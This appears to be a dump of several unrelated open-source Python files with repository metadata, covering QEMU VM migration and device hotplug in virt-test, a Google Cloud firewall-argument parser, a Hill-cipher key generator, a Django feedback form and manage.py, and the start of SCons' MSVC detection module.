device_add_cmd += ",netdev=%s" % nic.device_id
if nic.has_key('mac'):
device_add_cmd += ",mac=%s" % nic.mac
device_add_cmd += ",id=%s" % nic.nic_name
if nic['nic_model'] == 'virtio-net-pci':
if int(nic['queues']) > 1:
device_add_cmd += ",mq=on"
if nic.has_key('vectors'):
device_add_cmd += ",vectors=%s" % nic.vectors
device_add_cmd += nic.get('nic_extra_params', '')
if nic.has_key('romfile'):
device_add_cmd += ",romfile=%s" % nic.romfile
error.context("Activating nic on VM %s with monitor command %s" % (
self.name, device_add_cmd))
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(device_add_cmd)
else:
self.monitor.send_args_cmd(device_add_cmd, convert=False)
error.context("Verifying nic %s shows in qtree" % nic.nic_name)
qtree = self.monitor.info("qtree")
if not nic.nic_name in qtree:
logging.error(qtree)
raise virt_vm.VMAddNicError("Device %s was not plugged into qdev"
"tree" % nic.nic_name)
@error.context_aware
def deactivate_nic(self, nic_index_or_name, wait=20):
"""
Reverses what activate_nic did
:param nic_index_or_name: name or index number for existing NIC
:param wait: Time test will wait for the guest to unplug the device
"""
nic = self.virtnet[nic_index_or_name]
error.context("Removing nic %s from VM %s" % (nic_index_or_name,
self.name))
nic_del_cmd = "device_del id=%s" % (nic.nic_name)
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(nic_del_cmd)
else:
self.monitor.send_args_cmd(nic_del_cmd, convert=True)
if wait:
logging.info("waiting for the guest to finish the unplug")
if not utils_misc.wait_for(lambda: nic.nic_name not in
self.monitor.info("qtree"),
wait, 5, 1):
raise virt_vm.VMDelNicError("Device is not unplugged by "
"guest, please check whether the "
"hotplug module was loaded in "
"guest")
@error.context_aware
def deactivate_netdev(self, nic_index_or_name):
"""
Reverses what activate_netdev() did
:param: nic_index_or_name: name or index number for existing NIC
"""
# FIXME: Need to down interface & remove from bridge????
netdev_id = self.virtnet[nic_index_or_name].device_id
error.context("removing netdev id %s from vm %s" %
(netdev_id, self.name))
nic_del_cmd = "netdev_del id=%s" % netdev_id
if self.monitor.protocol == 'qmp':
self.monitor.send_args_cmd(nic_del_cmd)
else:
self.monitor.send_args_cmd(nic_del_cmd, convert=True)
network_info = self.monitor.info("network")
if netdev_id in network_info:
raise virt_vm.VMDelNetDevError("Fail to remove netdev %s" %
netdev_id)
@error.context_aware
def del_nic(self, nic_index_or_name):
"""
Undefine nic prameters, reverses what add_nic did.
:param nic_index_or_name: name or index number for existing NIC
:param wait: Time test will wait for the guest to unplug the device
"""
super(VM, self).del_nic(nic_index_or_name)
@error.context_aware
def send_fd(self, fd, fd_name="migfd"):
"""
Send file descriptor over unix socket to VM.
:param fd: File descriptor.
:param fd_name: File descriptor identificator in VM.
"""
error.context("Send fd %d like %s to VM %s" % (fd, fd_name, self.name))
logging.debug("Send file descriptor %s to source VM.", fd_name)
if self.monitor.protocol == 'human':
self.monitor.cmd("getfd %s" % (fd_name), fd=fd)
elif self.monitor.protocol == 'qmp':
self.monitor.cmd("getfd", args={'fdname': fd_name}, fd=fd)
error.context()
def mig_finished(self):
ret = True
if (self.params["display"] == "spice" and
self.get_spice_var("spice_seamless_migration") == "on"):
s = self.monitor.info("spice")
if isinstance(s, str):
ret = "migrated: true" in s
else:
ret = s.get("migrated") == "true"
o = self.monitor.info("migrate")
if isinstance(o, str):
return ret and (not "status: active" in o)
else:
return ret and (o.get("status") != "active")
def mig_succeeded(self):
o = self.monitor.info("migrate")
if isinstance(o, str):
return "status: completed" in o
else:
return o.get("status") == "completed"
def mig_failed(self):
o = self.monitor.info("migrate")
if isinstance(o, str):
return "status: failed" in o
else:
return o.get("status") == "failed"
def mig_cancelled(self):
if self.mig_succeeded():
raise virt_vm.VMMigrateCancelError(
"Migration completed successfully")
elif self.mig_failed():
raise virt_vm.VMMigrateFailedError("Migration failed")
o = self.monitor.info("migrate")
if isinstance(o, str):
return ("Migration status: cancelled" in o or
"Migration status: canceled" in o)
else:
return (o.get("status") == "cancelled" or
o.get("status") == "canceled")
def wait_for_migration(self, timeout):
if not utils_misc.wait_for(self.mig_finished, timeout, 2, 2,
"Waiting for migration to complete"):
raise virt_vm.VMMigrateTimeoutError("Timeout expired while waiting"
" for migration to finish")
@error.context_aware
def migrate(self, timeout=virt_vm.BaseVM.MIGRATE_TIMEOUT, protocol="tcp",
cancel_delay=None, offline=False, stable_check=False,
clean=True, save_path="/tmp", dest_host="localhost",
remote_port=None, not_wait_for_migration=False,
fd_src=None, fd_dst=None, migration_exec_cmd_src=None,
migration_exec_cmd_dst=None):
"""
Migrate the VM.
If the migration is local, the VM object's state is switched with that
of the destination VM. Otherwise, the state is switched with that of
a dead VM (returned by self.clone()).
:param timeout: Time to wait for migration to complete.
:param protocol: Migration protocol (as defined in MIGRATION_PROTOS)
:param cancel_delay: If provided, specifies a time duration after which
migration will be canceled. Used for testing migrate_cancel.
:param offline: If True, pause the source VM before migration.
:param stable_check: If True, compare the VM's state after migration to
its state before migration and raise an exception if they
differ.
:param clean: If True, delete the saved state files (relevant only if
stable_check is also True).
@save_path: The path for state files.
:param dest_host: Destination host (defaults to 'localhost').
:param remote_port: Port to use for remote migration.
:param not_wait_for_migration: If True migration start but not wait till
the end of migration.
:param fd_s: File descriptor for migration to which source
VM write data. Descriptor is closed during the migration.
:param fd_d: File descriptor for migration from which destination
VM read data.
:param migration_exec_cmd_src: Command to embed in '-incoming "exec: "'
(e.g. 'exec:gzip -c > filename') if migration_mode is 'exec'
default to listening on a random TCP port
:param migration_exec_cmd_dst: Command to embed in '-incoming "exec: "'
(e.g. 'gzip -c -d filename') if migration_mode is 'exec'
default to listening on a random TCP port
"""
if protocol not in self.MIGRATION_PROTOS:
raise virt_vm.VMMigrateProtoUnknownError(protocol)
error.base_context("migrating '%s'" % self.name)
local = dest_host == "localhost"
mig_fd_name = None
if protocol == "fd":
# Check if descriptors aren't None for local migration.
if local and (fd_dst is None or fd_src is None):
(fd_dst, fd_src) = os.pipe()
mig_fd_name = "migfd_%d_%d" % (fd_src, time.time())
self.send_fd(fd_src, mig_fd_name)
os.close(fd_src)
clone = self.clone()
if (local and not (migration_exec_cmd_src
and "gzip" in migration_exec_cmd_src)):
error.context("creating destination VM")
if stable_check:
# Pause the dest vm after creation
extra_params = clone.params.get("extra_params", "") + " -S"
clone.params["extra_params"] = extra_params
clone.create(migration_mode=protocol, mac_source=self,
migration_fd=fd_dst,
migration_exec_cmd=migration_exec_cmd_dst)
if fd_dst:
os.close(fd_dst)
error.context()
try:
if (self.params["display"] == "spice" and local and
not (protocol == "exec" and
(migration_exec_cmd_src and "gzip" in migration_exec_cmd_src))):
host_ip = utils_net.get_host_ip_address(self.params)
dest_port = clone.spice_options.get('spice_port', '')
if self.params.get("spice_ssl") == "yes":
dest_tls_port = clone.spice_options.get("spice_tls_port",
"")
cert_s = clone.spice_options.get("spice_x509_server_subj",
"")
cert_subj = "%s" % cert_s[1:]
cert_subj += host_ip
cert_subj = "\"%s\"" % cert_subj
else:
dest_tls_port = ""
cert_subj = ""
logging.debug("Informing migration to spice client")
commands = ["__com.redhat_spice_migrate_info",
"spice_migrate_info",
"client_migrate_info"]
for command in commands:
try:
self.monitor.verify_supported_cmd(command)
except qemu_monitor.MonitorNotSupportedCmdError:
continue
# spice_migrate_info requires host_ip, dest_port
# client_migrate_info also requires protocol
cmdline = "%s hostname=%s" % (command, host_ip)
if command == "client_migrate_info":
cmdline += " ,protocol=%s" % self.params['display']
if dest_port:
cmdline += ",port=%s" % dest_port
if dest_tls_port:
cmdline += ",tls-port=%s" % dest_tls_port
if cert_subj:
cmdline += ",cert-subject=%s" % cert_subj
break
self.monitor.send_args_cmd(cmdline)
if protocol in ["tcp", "rdma", "x-rdma"]:
if local:
uri = protocol + ":localhost:%d" % clone.migration_port
else:
uri = protocol + ":%s:%d" % (dest_host, remote_port)
elif protocol == "unix":
uri = "unix:%s" % clone.migration_file
elif protocol == "exec":
if local:
if not migration_exec_cmd_src:
uri = '"exec:nc localhost %s"' % clone.migration_port
else:
uri = '"exec:%s"' % (migration_exec_cmd_src)
else:
uri = '"exec:%s"' % (migration_exec_cmd_src)
elif protocol == "fd":
uri = "fd:%s" % mig_fd_name
if offline is True:
self.monitor.cmd("stop")
logging.info("Migrating to %s", uri)
self.monitor.migrate(uri)
if not_wait_for_migration:
return clone
if cancel_delay:
time.sleep(cancel_delay)
self.monitor.cmd("migrate_cancel")
if not utils_misc.wait_for(self.mig_cancelled, 60, 2, 2,
"Waiting for migration "
"cancellation"):
raise virt_vm.VMMigrateCancelError(
"Cannot cancel migration")
return
self.wait_for_migration(timeout)
if (local and (migration_exec_cmd_src
and "gzip" in migration_exec_cmd_src)):
error.context("creating destination VM")
if stable_check:
# Pause the dest vm after creation
extra_params = clone.params.get("extra_params", "") + " -S"
clone.params["extra_params"] = extra_params
clone.create(migration_mode=protocol, mac_source=self,
migration_fd=fd_dst,
migration_exec_cmd=migration_exec_cmd_dst)
self.verify_alive()
# Report migration status
if self.mig_succeeded():
logging.info("Migration completed successfully")
elif self.mig_failed():
raise virt_vm.VMMigrateFailedError("Migration failed")
else:
raise virt_vm.VMMigrateFailedError("Migration ended with "
"unknown status")
# Switch self <-> clone
temp = self.clone(copy_state=True)
self.__dict__ = clone.__dict__
clone = temp
# From now on, clone is the source VM that will soon be destroyed
# and self is the destination VM that will remain alive. If this
# is remote migration, self is a dead VM object.
error.context("after migration")
if local:
time.sleep(1)
self.verify_kernel_crash()
self.verify_alive()
if local and stable_check:
try:
save1 = os.path.join(save_path, "src-" + clone.instance)
save2 = os.path.join(save_path, "dst-" + self.instance)
clone.save_to_file(save1)
self.save_to_file(save2)
# Fail if we see deltas
md5_save1 = utils.hash_file(save1)
md5_save2 = utils.hash_file(save2)
if md5_save1 != md5_save2:
raise virt_vm.VMMigrateStateMismatchError()
finally:
if clean:
if os.path.isfile(save1):
os.remove(save1)
if os.path.isfile(save2):
os.remove(save2)
finally:
# If we're doing remote migration and it's completed successfully,
# self points to a dead VM object
if not not_wait_for_migration:
if self.is_alive():
self.monitor.cmd("cont")
clone.destroy(gracefully=False)
@error.context_aware
def reboot(self, session=None, method="shell", nic_index=0,
timeout=virt_vm.BaseVM.REBOOT_TIMEOUT):
"""
Reboot the VM and wait for it to come back up by trying to log in until
timeout expires.
:param session: A shell session object or None.
:param method: Reboot method. Can be "shell" (send a shell reboot
command) or "system_reset" (send a system_reset monitor command).
:param nic_index: Index of NIC to access in the VM, when logging in
after rebooting.
:param timeout: Time to wait for login to succeed (after rebooting).
:return: A new shell session object.
"""
error.base_context("rebooting '%s'" % self.name, logging.info)
error.context("before reboot")
error.context()
if method == "shell":
session = session or self.login()
session.sendline(self.params.get("reboot_command"))
error.context("waiting for guest to go down", logging.info)
if not utils_misc.wait_for(
lambda:
not session.is_responsive(
timeout=self.CLOSE_SESSION_TIMEOUT),
timeout / 2, 0, 1):
raise virt_vm.VMRebootError("Guest refuses to go down")
session.close()
elif method == "system_reset":
# Clear the event list of all QMP monitors
qmp_monitors = [m for m in self.monitors if m.protocol == "qmp"]
for m in qmp_monitors:
m.clear_events()
# Send a system_reset monitor command
self.monitor.cmd("system_reset")
# Look for RESET QMP events
time.sleep(1)
for m in qmp_monitors:
if m.get_event("RESET"):
logging.info("RESET QMP event received")
else:
raise virt_vm.VMRebootError("RESET QMP event not received "
"after system_reset "
"(monitor '%s')" % m.name)
else:
raise virt_vm.VMRebootError("Unknown reboot method: %s" % method)
if self.params.get("mac_changeable") == "yes":
utils_net.update_mac_ip_address(self, self.params)
error.context("logging in after reboot", logging.info)
return self.wait_for_login(nic_index, timeout=timeout)
def send_key(self, keystr):
"""
Send a key event to the VM.
:param keystr: A key event string (e.g. "ctrl-alt-delete")
"""
# For compatibility with versions of QEMU that do not recognize all
# key names: replace keyname with the hex value from the dict, which
# QEMU will definitely accept
key_mapping = {"semicolon": "0x27",
"comma": "0x33",
"dot": "0x34",
"slash": "0x35"}
for key, value in key_mapping.items():
keystr = keystr.replace(key, value)
self.monitor.sendkey(keystr)
time.sleep(0.2)
# should this really be expected from VMs of all hypervisor types?
def screendump(self, filename, debug=True):
try:
if self.monitor:
self.monitor.screendump(filename=filename, debug=debug)
except qemu_monitor.MonitorError, e:
logging.warn(e)
def save_to_file(self, path):
"""
Override BaseVM save_to_file method
"""
self.verify_status('paused') # Throws exception if not
# Set high speed 1TB/S
self.monitor.migrate_set_speed(str(2 << 39))
self.monitor.migrate_set_downtime(self.MIGRATE_TIMEOUT)
logging.debug("Saving VM %s to %s" % (self.name, path))
# Can only check status if background migration
self.monitor.migrate("exec:cat>%s" % path, wait=False)
utils_misc.wait_for(
# no monitor.migrate-status method
lambda:
re.search("(status.*completed)",
str(self.monitor.info("migrate")), re.M),
self.MIGRATE_TIMEOUT, 2, 2,
"Waiting for save to %s to complete" % path)
# Restore the speed and downtime to default values
self.monitor.migrate_set_speed(str(32 << 20))
self.monitor.migrate_set_downtime(0.03)
# Base class defines VM must be off after a save
self.monitor.cmd("system_reset")
self.verify_status('paused') # Throws exception if not
def restore_from_file(self, path):
"""
Override BaseVM restore_from_file method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Restoring VM %s from %s" % (self.name, path))
# Rely on create() in incoming migration mode to do the 'right thing'
self.create(name=self.name, params=self.params, root_dir=self.root_dir,
timeout=self.MIGRATE_TIMEOUT, migration_mode="exec",
migration_exec_cmd="cat " + path, mac_source=self)
self.verify_status('running') # Throws exception if not
def savevm(self, tag_name):
"""
Override BaseVM savevm method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Saving VM %s to %s" % (self.name, tag_name))
self.monitor.send_args_cmd("savevm id=%s" % tag_name)
self.monitor.cmd("system_reset")
self.verify_status('paused') # Throws exception if not
def loadvm(self, tag_name):
"""
Override BaseVM loadvm method
"""
self.verify_status('paused') # Throws exception if not
logging.debug("Loading VM %s from %s" % (self.name, tag_name))
self.monitor.send_args_cmd("loadvm id=%s" % tag_name)
self.verify_status('paused') # Throws exception if not
def pause(self):
"""
Pause the VM operation.
"""
self.monitor.cmd("stop")
def resume(self):
"""
Resume the VM operation in case it's stopped.
"""
self.monitor.cmd("cont")
def set_link(self, netdev_name, up):
"""
Set link up/down.
:param name: Link name
:param up: Bool value, True=set up this link, False=Set down this link
"""
self.monitor.set_link(netdev_name, up)
def get_block_old(self, blocks_info, p_dict={}):
"""
Get specified block device from monitor's info block command.
The block device is defined by parameter in p_dict.
:param p_dict: Dictionary that contains parameters and its value used
to define specified block device.
@blocks_info: the results of monitor command 'info block'
:return: Matched block device name, None when not find any device.
"""
if isinstance(blocks_info, str):
for block in blocks_info.splitlines():
match = True
for key, value in p_dict.iteritems():
if value is True:
check_str = "%s=1" % key
elif value is False:
check_str = "%s=0" % key
else:
check_str = "%s=%s" % (key, value)
if check_str not in block:
match = False
break
if match:
return block.split(":")[0]
else:
for block in blocks_info:
match = True
for key, value in p_dict.iteritems():
if isinstance(value, bool):
check_str = "u'%s': %s" % (key, value)
else:
check_str = "u'%s': u'%s'" % (key, value)
if check_str not in str(block):
match = False
break
if match:
return block['device']
return None
def process_info_block(self, blocks_info):
"""
process the info block, so that can deal with
the new and old qemu formart.
:param blocks_info: the output of qemu command
'info block'
"""
block_list = []
block_entry = []
for block in blocks_info.splitlines():
if block:
block_entry.append(block.strip())
else:
block_list.append(' '.join(block_entry))
block_entry = []
# don't forget the last one
block_list.append(' '.join(block_entry))
return block_list
def get_block(self, p_dict={}):
"""
Get specified block device from monitor's info block command.
The block device is defined by parameter in p_dict.
:param p_dict: Dictionary that contains parameters and its value used
to define specified block device.
:return: Matched block device name, None when not find any device.
"""
blocks_info = self.monitor.info("block")
block = self.get_block_old(blocks_info, p_dict)
if block:
return block
block_list = self.process_info_block(blocks_info)
for block in block_list:
for key, value in p_dict.iteritems():
# for new qemu we just deal with key = [removable,
# file,backing_file], for other types key, we should
# fixup later
logging.info("block = %s" % block)
if key == 'removable':
if value is False:
if not 'Removable device' in block:
return block.split(":")[0]
elif value is True:
if 'Removable device' in block:
return block.split(":")[0]
# file in key means both file and backing_file
if ('file' in key) and (value in block):
return block.split(":")[0]
return None
def check_block_locked(self, value):
"""
Check whether specified block device is locked or not.
Return True, if device is locked, else False.
:param vm: VM object
:param value: Parameter that can specify block device.
Can be any possible identification of a device,
Such as device name/image file name/...
:return: True if device is locked, False if device is unlocked.
"""
assert value, "Device identification not specified"
blocks_info = self.monitor.info("block")
assert value in str(blocks_info), \
"Device %s not listed in monitor's output" % value
if isinstance(blocks_info, str):
lock_str = "locked=1"
lock_str_new = "locked"
no_lock_str = "not locked"
for block in blocks_info.splitlines():
if (value in block) and (lock_str in block):
return True
# deal with new qemu
block_list = self.process_info_block(blocks_info)
for block_new in block_list:
if (value in block_new) and ("Removable device" in block_new):
if no_lock_str in block_new:
return False
elif lock_str_new in block_new:
return True
else:
for block in blocks_info:
if value in str(block):
return block['locked']
return False
def live_snapshot(self, base_file, snapshot_file,
snapshot_format="qcow2"):
"""
Take a live disk snapshot.
:param base_file: base file name
:param snapshot_file: snapshot file name
:param snapshot_format: snapshot file format
:return: File name of disk snapshot.
"""
device = self.get_block({"file": base_file})
output = self.monitor.live_snapshot(device, snapshot_file,
snapshot_format)
logging.debug(output)
device = self.get_block({"file": snapshot_file})
if device:
current_file = device
else:
current_file = None
return current_file
def block_stream(self, device, speed, base=None, correct=True):
"""
start to stream block device, aka merge snapshot;
:param device: device ID;
:param speed: limited speed, default unit B/s;
:param base: base file;
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_stream_cmd", "block-stream")
return self.monitor.block_stream(device, speed, base,
cmd, correct=correct)
def block_mirror(self, device, target, speed, sync,
format, mode="absolute-paths", correct=True):
"""
Mirror block device to target file;
:param device: device ID
:param target: destination image file name;
:param speed: max limited speed, default unit is B/s;
:param sync: what parts of the disk image should be copied to the
destination;
:param mode: new image open mode
:param format: target image format
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_mirror_cmd", "drive-mirror")
return self.monitor.block_mirror(device, target, speed, sync,
format, mode, cmd, correct=correct)
def block_reopen(self, device, new_image, format="qcow2", correct=True):
"""
Reopen a new image, no need to do this step in rhel7 host
:param device: device ID
:param new_image: new image filename
:param format: new image format
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_reopen_cmd", "block-job-complete")
return self.monitor.block_reopen(device, new_image,
format, cmd, correct=correct)
def cancel_block_job(self, device, correct=True):
"""
cancel active job on the image_file
:param device: device ID
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("block_job_cancel_cmd", "block-job-cancel")
return self.monitor.cancel_block_job(device, cmd, correct=correct)
def set_job_speed(self, device, speed="0", correct=True):
"""
set max speed of block job;
:param device: device ID
:param speed: max speed of block job
:param correct: auto correct cmd, correct by default
"""
cmd = self.params.get("set_block_job_speed", "block-job-set-speed")
return self.monitor.set_block_job_speed(device, speed,
cmd, correct=correct)
def get_job_status(self, device):
"""
get block job info;
:param device: device ID
"""
return self.monitor.query_block_job(device)
|
spcui/virt-test
|
virttest/qemu_vm.py
|
Python
|
gpl-2.0
| 146,685 | 0.000389 |
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common classes and functions for firewall rules."""
import re
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import exceptions as calliope_exceptions
ALLOWED_METAVAR = 'PROTOCOL[:PORT[-PORT]]'
LEGAL_SPECS = re.compile(
r"""
(?P<protocol>[a-zA-Z0-9+.-]+) # The protocol group.
(:(?P<ports>\d+(-\d+)?))? # The optional ports group.
# May specify a range.
$ # End of input marker.
""",
re.VERBOSE)
def AddCommonArgs(parser, for_update=False):
"""Adds common arguments for firewall create or update subcommands."""
min_length = 0 if for_update else 1
switch = [] if min_length == 0 else None
allow = parser.add_argument(
'--allow',
metavar=ALLOWED_METAVAR,
type=arg_parsers.ArgList(min_length=min_length),
action=arg_parsers.FloatingListValuesCatcher(switch_value=switch),
help='The list of IP protocols and ports which will be allowed.',
required=not for_update)
allow.detailed_help = """\
A list of protocols and ports whose traffic will be allowed.
PROTOCOL is the IP protocol whose traffic will be allowed.
PROTOCOL can be either the name of a well-known protocol
(e.g., tcp or icmp) or the IP protocol number.
A list of IP protocols can be found at
link:http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml[].
A port or port range can be specified after PROTOCOL to
allow traffic through specific ports. If no port or port range
is specified, connections through all ranges are allowed. For
example, the following will create a rule that allows TCP traffic
through port 80 and allows ICMP traffic:
$ {command} MY-RULE --allow tcp:80 icmp
TCP and UDP rules must include a port or port range.
"""
if for_update:
allow.detailed_help += """
Setting this will override the current values.
"""
parser.add_argument(
'--description',
help='A textual description for the firewall rule.{0}'.format(
' Set to an empty string to clear existing.' if for_update else ''))
source_ranges = parser.add_argument(
'--source-ranges',
default=None if for_update else [],
metavar='CIDR_RANGE',
type=arg_parsers.ArgList(min_length=min_length),
action=arg_parsers.FloatingListValuesCatcher(switch_value=switch),
help=('A list of IP address blocks that may make inbound connections '
'in CIDR format.'))
source_ranges.detailed_help = """\
A list of IP address blocks that are allowed to make inbound
connections that match the firewall rule to the instances on
the network. The IP address blocks must be specified in CIDR
format:
link:http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing[].
"""
if for_update:
source_ranges.detailed_help += """
Setting this will override the existing source ranges for the firewall.
The following will clear the existing source ranges:
$ {command} MY-RULE --source-ranges
"""
else:
source_ranges.detailed_help += """
If neither --source-ranges nor --source-tags is provided, then this
flag will default to 0.0.0.0/0, allowing all sources. Multiple IP
address blocks can be specified if they are separated by spaces.
"""
source_tags = parser.add_argument(
'--source-tags',
default=None if for_update else [],
metavar='TAG',
type=arg_parsers.ArgList(min_length=min_length),
action=arg_parsers.FloatingListValuesCatcher(switch_value=switch),
help=('A list of instance tags indicating the set of instances on the '
'network which may make network connections that match the '
'firewall rule.'))
source_tags.detailed_help = """\
A list of instance tags indicating the set of instances on the
network which may make network connections that match the
firewall rule. If omitted, all instances on the network can
make connections that match the rule.
Tags can be assigned to instances during instance creation.
"""
if for_update:
source_tags.detailed_help += """
Setting this will override the existing source tags for the firewall.
The following will clear the existing source tags:
$ {command} MY-RULE --source-tags
"""
target_tags = parser.add_argument(
'--target-tags',
default=None if for_update else [],
metavar='TAG',
type=arg_parsers.ArgList(min_length=min_length),
action=arg_parsers.FloatingListValuesCatcher(switch_value=switch),
help=('A list of instance tags indicating the set of instances on the '
'network which may make accept inbound connections that match '
'the firewall rule.'))
target_tags.detailed_help = """\
A list of instance tags indicating the set of instances on the
network which may make accept inbound connections that match the
firewall rule. If omitted, all instances on the network can
receive inbound connections that match the rule.
Tags can be assigned to instances during instance creation.
"""
if for_update:
target_tags.detailed_help += """
Setting this will override the existing target tags for the firewall.
The following will clear the existing target tags:
$ {command} MY-RULE --target-tags
"""
parser.add_argument(
'name',
help='The name of the firewall rule to {0}'.format(
'update.' if for_update else 'create.'))
def ParseAllowed(allowed, message_classes):
"""Parses protocol:port mappings from --allow command line."""
allowed_value_list = []
for spec in allowed or []:
match = LEGAL_SPECS.match(spec)
if not match:
raise calliope_exceptions.ToolException(
'Firewall rules must be of the form {0}; received [{1}].'
.format(ALLOWED_METAVAR, spec))
if match.group('ports'):
ports = [match.group('ports')]
else:
ports = []
allowed_value_list.append(message_classes.Firewall.AllowedValueListEntry(
IPProtocol=match.group('protocol'),
ports=ports))
return allowed_value_list
|
flgiordano/netcash
|
+/google-cloud-sdk/lib/googlecloudsdk/api_lib/compute/firewalls_utils.py
|
Python
|
bsd-3-clause
| 6,885 | 0.003631 |
#!/usr/bin/env python3
import random
import numpy as np
import sympy
mod_space = 29
'''
Generate Encryption Key
'''
# In --> size of matrix (n x n)
# Out --> List of lists [[1,2,3],[4,5,6],[7,8,9]]
def generate_encryption_key(size):
determinant = 0
# Need to make sure encryption key is invertible, IE det(key) != 0
while determinant == 0:
matrix = []
for i in range(size): # Repeat i times based on input size
row = []
for k in range(size):
# Add Random integer from 0 - mod space that we are working in
number = random.randint(0, mod_space)
row.append(number)
matrix.append(row) # Add row to matrix
# Convert list of lists into numpy array, which acts as a matrix
encryption_key = np.array(matrix)
try:
determinant = sympy.Matrix(encryption_key.tolist()).inv_mod(29).det()
except:
pass
# If matrix is invertible, end function and return matrix
#print(determinant)
#determinant = int(np.linalg.det(encryption_key))
return encryption_key
'''
Find Modular Inverse
'''
# In --> number, modspace (default is 29 for our case)
# Out --> modular inverse of number
def modular_inverse(num):
for i in range(mod_space): # Loop through possibile inverses in modspace
if (num * i) % mod_space == 1: # If i is an inverse for the number in modspace, return the number
return i
return False # If inverse does not exist, return False
'''
Generate Decryption Key
'''
# In --> Encryption Key (matrix form)
# Out --> Decryption Key
def generate_decryption_key(encryption_key):
# Take the prod of these 2 vars
key_inv = np.linalg.inv(encryption_key) # Inverse of encryption key
# Determinant of encryption key
det_key = int(np.linalg.det(encryption_key))
#print((key_inv * (det_key) * modular_inverse(det_key)) % 29)
# How to get multiplicative inverse of det(key) % 29
# If key = [[1,2],[3,4]] , det(key) % 29 == 27 and
## inverse(det(key) % 29) == 14
##
##
# How do we get from 27 to 14?
##
# (det_key_mod * x) % 29 = inv --> solve for x
# x == 14 in our example
det_key_mod = int(det_key % 29) # Determinant of encryption key mod 29
# Find modular inverse of above var using function defined above
det_key_mod_inv = int(modular_inverse(det_key_mod))
#print(det_key_mod, det_key_mod_inv)
# Final decryption key for [[1,2],[3,4]] is [[27,1],[16,14]]
# decryption_key = inv(det(key)mod29) * (det(key) * inv(key)) % 29
decryption_key = (key_inv * det_key)
#decryption_key = np.around(decryption_key)
#decryption_key = decryption_key.astype(int)
decryption_key = (det_key_mod_inv * decryption_key) % 29
decryption_key = np.around(decryption_key, 0)
#print(decryption_key)
return decryption_key
def generate_sympy_decryption_key(encryption_key):
encryption_key = sympy.Matrix(encryption_key.tolist())
#key_inverse = encryption_key ** -1
#key_determinant = encryption_key.det()
decryption_key = np.array(encryption_key.inv_mod(29))
#key_determinant_mod = key_determinant % 29
return decryption_key
#x = np.array([[1,2],[3,4]])
# print(x)
#x = generate_encryption_key(4)
#generate_sympy_decryption_key(x)
#print(x)
#res = generate_decryption_key(x)
|
jbloom512/Linear_Algebra_Encryption
|
Generate_Encryption_Key.py
|
Python
|
mit
| 3,446 | 0.006384 |
from django.forms import ModelForm
from bug_reporting.models import Feedback
from CoralNet.forms import FormHelper
class FeedbackForm(ModelForm):
class Meta:
model = Feedback
fields = ('type', 'comment') # Other fields are auto-set
#error_css_class = ...
#required_css_class = ...
def clean(self):
"""
1. Strip spaces from character fields.
2. Call the parent's clean() to finish up with the default behavior.
"""
data = FormHelper.stripSpacesFromFields(
self.cleaned_data, self.fields)
self.cleaned_data = data
return super(FeedbackForm, self).clean()
|
DevangS/CoralNet
|
bug_reporting/forms.py
|
Python
|
bsd-2-clause
| 661 | 0.006051 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mobilepolls.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
jacol12345/TP-ankiety-web-app
|
mobilepolls/manage.py
|
Python
|
mit
| 254 | 0 |
#
# Copyright (c) 2001 - 2019 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# TODO:
# * supported arch for versions: for old versions of batch file without
# argument, giving bogus argument cannot be detected, so we have to hardcode
# this here
# * print warning when msvc version specified but not found
# * find out why warning do not print
# * test on 64 bits XP + VS 2005 (and VS 6 if possible)
# * SDK
# * Assembly
__revision__ = "src/engine/SCons/Tool/MSCommon/vc.py bee7caf9defd6e108fc2998a2520ddb36a967691 2019-12-17 02:07:09 bdeegan"
__doc__ = """Module for Visual C/C++ detection and configuration.
"""
import SCons.compat
import SCons.Util
import subprocess
import os
import platform
import sys
from string import digits as string_digits
if sys.version_info[0] == 2:
import collections
import SCons.Warnings
from SCons.Tool import find_program_path
from . import common
debug = common.debug
from . import sdk
get_installed_sdks = sdk.get_installed_sdks
class VisualCException(Exception):
pass
class UnsupportedVersion(VisualCException):
pass
class MSVCUnsupportedHostArch(VisualCException):
pass
class MSVCUnsupportedTargetArch(VisualCException):
pass
class MissingConfiguration(VisualCException):
pass
class NoVersionFound(VisualCException):
pass
class BatchFileExecutionError(VisualCException):
pass
# Dict to 'canonalize' the arch
_ARCH_TO_CANONICAL = {
